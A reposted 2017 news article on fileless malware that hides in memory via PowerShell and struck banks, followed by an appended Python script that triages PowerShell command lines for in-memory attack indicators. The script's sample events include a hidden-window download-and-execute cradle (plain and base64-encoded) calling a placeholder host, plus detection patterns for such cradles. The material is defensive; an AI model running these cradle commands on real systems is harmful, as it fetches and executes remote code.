[Note: This item comes from friend Steve Goldstein. DLH]
Say Hello to the Super-Stealthy Malware That’s Going Mainstream
By LILY HAY NEWMAN
Feb 9 2017
Typical anti-malware software scans hard drives in search of malicious files, and then flags them for removal. That strategy breaks down, though, when there’s no file to find on the system in the first place. And that’s exactly how an increasingly popular type of attack has stymied the defenses of dozens of banks around the world.
So-called fileless malware avoids detection by hiding its payload in secluded spots, like a computer’s random-access memory or kernel, meaning it doesn’t depend on hard drive files to run. The technique first surfaced a couple of years ago, as part of a sophisticated nation-state reconnaissance attack, but has experienced a recent surge in popularity. It’s also not just hitting high-priority targets; research released by Kaspersky Lab on Wednesday found that fileless malware infected more than 140 financial institutions, government organizations, and telecom companies across 40 countries.
Kaspersky itself might not have found it had a bank not come to the security firm after discovering malware running in secret in the memory of one of its domain controllers (a server on a Windows network that handles security authentication queries). The attack was recording system administrator credentials so the hackers could move deeper into the network, gather more privileged credentials, and eventually withdraw money from ATMs.
What makes the attack so insidious is that it inhabits parts of the computer architecture that are difficult for normal users to even navigate to and access, much less interact with. While it’s possible to eliminate the threat, many organizations aren’t even focused on spotting it in the first place yet.
That’s unfortunate, because it’s also seen a dramatic spike in popularity. In a December report, the endpoint security firm Carbon Black found that the rate of fileless malware attacks among its customers had jumped from three percent of the company’s total malware detections at the beginning of 2016 to 13 percent in November.
“I would say this is becoming more of a checkbox for attackers’ toolkits,” says Greg Linares, a security researcher who specializes in threat intelligence and reverse engineering. Just one example: Hackers can use administrative operating system tools, like the Windows PowerShell framework, to covertly deposit the malware into a computer’s RAM. More than 70 percent of the infections Kaspersky detected utilized malicious PowerShell scripts.
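Because the PowerShell-based, memory-only loading described above leaves no file for a disk scanner to find, defenders instead inspect process command lines and the scripts hidden inside them. The following Python triage is an added example, not part of the article or of Kaspersky's research: it flags PowerShell invocations that carry several indicators of in-memory execution, decoding any -EncodedCommand blob so the concealed script is checked too. The sample events, indicator names and the example.invalid URL are constructed.

```python
from __future__ import annotations
import base64
import re

# Constructed decoded script used by the encoded sample below (not a real payload).
STAGE_TEXT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"
ENCODED = base64.b64encode(STAGE_TEXT.encode("utf-16le")).decode()

SAMPLE_EVENTS = [  # constructed process-creation command lines, not real telemetry
    r"C:\Windows\System32\cmd.exe /c whoami",
    'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"',
    f"powershell.exe -nop -w hidden -ep bypass -enc {ENCODED}",
    f'powershell.exe -WindowStyle Hidden -Command "{STAGE_TEXT}"',
]

# PowerShell accepts any unambiguous prefix of a switch, so the short forms count too.
INDICATORS = {
    "encoded_command": r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}",
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "no_profile": r"-nop(?:rofile)?\b",
    "policy_bypass": r"-e(?:p|xecutionpolicy)\s+bypass",
    "download_cradle": r"downloadstring|downloaddata|invoke-webrequest|net\.webclient",
    "invoke_expression": r"\biex\b|invoke-expression",
    "reflective_load": r"reflection\.assembly\]::load",
}

def decode_encoded_command(cmdline: str) -> str | None:
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent/invalid."""
    m = re.search(INDICATORS["encoded_command"], cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(0).split()[-1], validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def powershell_indicators(cmdline: str) -> list[str]:
    """Indicator names present in a PowerShell command line and its decoded payload."""
    if not re.search(r"\b(?:powershell|pwsh)(?:\.exe)?\b", cmdline, re.IGNORECASE):
        return []
    text = cmdline + "\n" + (decode_encoded_command(cmdline) or "")
    return [n for n, pat in INDICATORS.items() if re.search(pat, text, re.IGNORECASE)]

def triage(events: list[str], threshold: int = 2) -> list[tuple[str, list[str]]]:
    """Events with at least `threshold` indicators: a lone -NoProfile is routine admin
    work, a hidden window plus a download cradle run in memory deserves an analyst's look."""
    scored = [(e, powershell_indicators(e)) for e in events]
    return [(e, inds) for e, inds in scored if len(inds) >= threshold]
```

Feeding real command lines from process-creation or PowerShell script block logging into `triage` is the intended use; the threshold keeps ordinary administrative invocations out of the queue.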